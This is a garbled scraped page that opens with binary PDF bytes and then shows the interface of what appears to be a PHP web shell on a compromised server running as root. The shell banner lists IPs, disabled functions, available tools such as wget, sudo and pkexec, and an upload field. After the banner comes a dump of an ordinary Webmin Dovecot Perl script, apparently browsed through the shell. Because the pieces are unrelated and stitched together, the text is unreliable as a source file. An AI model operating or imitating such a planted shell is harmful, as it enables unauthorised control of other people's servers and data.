%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,mail,shell_exec,system,proc_open,popen,ini_alter,dl,proc_close,curl_exec,curl_multi_exec,readfile,parse_ini_file,escapeshellarg,escapeshellcmd,show_source,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,mail,php_uname,phpinfo MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/webmin/dovecot/ |
Upload File : |
#!/usr/bin/perl # Update mail file options require './dovecot-lib.pl'; &ReadParse(); &error_setup($text{'mail_err'}); $conf = &get_config(); &lock_dovecot_files($conf); # Mail file location if ($in{'envmode'} == 4) { $in{'other'} =~ /^\S+$/ || &error($text{'mail_eenv'}); $env = $in{'other'}; } else { $env = $mail_envs[$in{'envmode'}]; } # Add index file location $env || !$in{'indexmode'} || &error($text{'mail_eindexmode'}); $env || !$in{'controlmode'} || &error($text{'mail_econtrolmode'}); if ($in{'indexmode'} == 1) { $env .= ":INDEX=MEMORY"; } elsif ($in{'indexmode'} == 2) { $in{'index'} =~ /^\/\S+$/ || &error($text{'mail_eindex'}); $env .= ":INDEX=".$in{'index'}; } if ($in{'controlmode'}) { $in{'control'} =~ /^\/\S+$/ || &error($text{'mail_econtrol'}); $env .= ":CONTROL=".$in{'control'}; } if (&find("default_mail_env", $conf, 2)) { &save_directive($conf, "default_mail_env", $env eq "" ? undef : $env); } else { &save_directive($conf, "mail_location", $env eq "" ? undef : $env); } # Idle intervals $in{'idle'} != 2 || $in{'idlei'} =~ /^\d+$/ || &error($text{'mail_eidle'}); &save_directive($conf, "mailbox_idle_check_interval", $in{'idle'} == 1 ? "520 weeks" : $in{'idle'} == 2 ? "$in{'idlei'} seconds" : undef); # Yes/no options &save_directive($conf, "mail_full_filesystem_access", $in{'full'} ? $in{'full'} : undef); &save_directive($conf, "mail_save_crlf", $in{'crlf'} ? $in{'crlf'} : undef); if (&find("mbox_dirty_syncs", $conf, 2)) { &save_directive($conf, "mbox_dirty_syncs", $in{'change'} ? $in{'change'} : undef); } else { &save_directive($conf, "maildir_check_content_changes", $in{'change'} ? $in{'change'} : undef); } # Umask $in{'umask_def'} || $in{'umask'} =~ /^[0-7]{4}$/ ||&error($text{'mail_eumask'}); &save_directive($conf, "umask", $in{'umask_def'} ? undef : $in{'umask'}); # UIDL format if (&find("pop3_uidl_format", $conf, 2)) { $uidl = $in{'pop3_uidl_format'} eq '*' ? $in{'pop3_uidl_format_other'} : $in{'pop3_uidl_format'}; $uidl =~ /^\S+$/ || &error($text{'mail_euidl'}); &save_directive($conf, "pop3_uidl_format", $uidl); } # LAST command &save_directive($conf, "pop3_enable_last", $in{'last'} ? $in{'last'} : undef); # Index lock method if (&find("lock_method", $conf, 2)) { &save_directive($conf, "lock_method", $in{'lock_method'} ? $in{'lock_method'} : undef); } # Mailbox lock method foreach $l ("mbox_read_locks", "mbox_write_locks") { next if (!&find($l, $conf, 2)); if ($in{$l."_def"}) { &save_directive($conf, $l, undef); } else { @methods = ( ); for(my $i=0; defined($m = $in{$l."_".$i}); $i++) { push(@methods, $m) if ($m); } @methods || &error($text{'mail_e'.$l}); &save_directive($conf, $l, join(" ", @methods)); } } &flush_file_lines(); &unlock_dovecot_files($conf); &webmin_log("mail"); &redirect("");